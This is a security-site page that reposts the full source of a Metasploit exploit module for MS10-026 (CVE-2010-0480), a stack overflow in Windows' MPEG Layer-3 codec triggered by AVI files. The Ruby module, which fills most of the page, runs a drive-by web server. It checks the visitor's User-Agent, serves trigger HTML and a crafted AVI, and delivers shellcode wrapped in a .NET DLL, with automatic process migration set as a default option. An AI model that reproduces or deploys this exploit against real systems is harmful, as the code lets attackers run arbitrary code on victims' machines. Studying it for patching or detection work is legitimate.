首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
来源:http://www.metasploit.com 作者:YamataLi 发布时间:2011-08-15  

##
# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
   'Description'    => %q{
     This module exploits a buffer overlow in l3codecx.ax while processing a
    AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite
    with 0's so the three least significant bytes of EIP saved on stack are
    overwritten and shellcode is mapped using the .NET DLL memory technique pioneered
    by Alexander Sotirov and Mark Dowd.

    Please note on IE 8 targets, your malicious URL must be a trusted site in order
    to load the .Net control.
   },
   'Author'         =>
    [
     'Yamata Li', # Vulnerability Discovery
     'Shahin Ramezany <shahin[at]abysssec.com', # Vulnerability Analysis and Exploit
     'juan vazquez', # Metasploit module
     'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13555 $',
   'References'     =>
    [
     ['CVE', '2010-0480'],
     ['OSVDB', '63749'],
     ['BID', '39303'],
     ['MSB', 'MS10-026'],
     ['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],
     ['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']
    ],
   'Payload'        =>
    {
     'Space'    => 4000
    },
   'DefaultOptions' =>
    {
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Targets'        =>
    [
     # Target 0: Automatic
     # Tested with:
     # Windows XP SP3 English IE 6
     # Windows XP SP3 English IE 7
     # Windows XP SP3 English IE 8: The exploiting site must be a trusted
     # site to load the .NET control
     # .NET CLR required
     [
      'Windows XP SP3 Automatic',
      {
       'Platform' => 'win',
       'Ret' => 0x72000000
      },
     ]
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Apr 13 2010'))
 end

 def exploit
  # Embed our payload in a .Net binary
  ibase = target.ret - 0x10000
  shellcode = rand_text_alpha(target.ret - ibase - 0x2285)
  shellcode << payload.encoded

  #Use our own custom .Net binary, because we require a much bigger file
  #to land our payload at the right place
  opts = {
   :template    => 'template_dotnetmem.dll',
   :text_offset => 0x1285,
   :text_max    => 0x20000,
   :pack        => 'a131072',
   :uuid_offset => 135816
  }

  @dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)

  # Load our AVI file
  path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi")
  f = File.open(path, "rb")
  @trigger = f.read(f.stat.size)
  f.close

  super
 end

 def on_request_uri(cli, request)

  agent = request['User-Agent']
  case request['User-Agent']
   when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/
   when /Windows-Media-Player/
    # AVI is requested by WMP
   else
    send_not_found(cli)
    print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}")
    return
  end

  if (request.uri =~ /\.html/i)
   avi_name = rand_text_alpha(4)
   avi_trigger = ""

   if ("/" == get_resource[-1,1])
    avi_trigger = get_resource[0, get_resource.length - 1]
   else
    avi_trigger = get_resource
   end

   avi_trigger << "/#{avi_name}.avi"

   html = %Q|<html>
   <body>
   <OBJECT ID="MediaPlayer"
   CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"
   CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#
   Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."
   TYPE="application/x-oleobject" width="280" height="46">
    <param name="fileName" value="#{avi_trigger}">
    <param name="animationatStart" value="true">
    <param name="transparentatStart" value="true">
    <param name="autoStart" value="true">
    <param name="showControls" value="true">
    <param name="Volume" value="-300">
   <embed type="application/x-mplayer2"
    pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
    src="#{avi_trigger}"
    name="MediaPlayer"
    width=280
    height=46
    autostart=1
    showcontrols=1
    volume=-300>
   </embed>
   </OBJECT>
   </body>
   </html>
   |

   html = html.gsub(/^\t\t\t/, '')

   print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...")
   send_response_html(cli, html)

  elsif (request.uri =~ /\.avi$/i)

   print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..."
   send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
   return

  elsif (request.uri =~ /\.dll$/i)

   print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..."
   send_response(
    cli,
    @dotnet_payload,
    {
     'Content-Type' => 'application/x-msdownload',
     'Connection'   => 'close',
     'Pragma'       => 'no-cache'
    }
   )
   return

  end

  html_name = rand_text_alpha(4)
  dll_uri = ""
  html_trigger = ""

  if ("/" == get_resource[-1,1])
   dll_uri = get_resource[0, get_resource.length - 1]
   html_trigger = get_resource[0, get_resource.length - 1]
  else
   dll_uri = get_resource
   html_trigger = get_resource
  end

  dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
  js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"
  html_trigger << "/#{html_name}.html"

  html  = %Q|<html>
  <head>
  <script language="javascript">
   function forward() {
    window.location = window.location + '#{html_trigger}';
   }

   function start() {
    setTimeout("forward()", 2000);
   }
  </script>
  </head>
  <body onload="start()">
  <object classid="#{dll_uri}#GenericControl">
  <object>
  </body>
  </html>
  |

  html = html.gsub(/^\t\t/, '')

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
  send_response_html(cli, html)
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple HTTPd 1.42 Denial of Se
·SikaBoom Remote Buffer Overflo
·TeeChart Professional ActiveX
·NSHC Papyrus Heap Overflow Vul
·Allomani Songs & Clips 2.x (ms
·D.R. Software Audio Converter
·PhpMyadmin XSRF Vuln (Execute
·Contrexx Shopsystem <= 2.2 SP3
·MP3 CD Converter Professional
·Simple HTTPd 1.42 PUT Request
·Sagem Router Fast 3304/3464/35
·Mozilla Firefox 3.6.16 mChanne
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved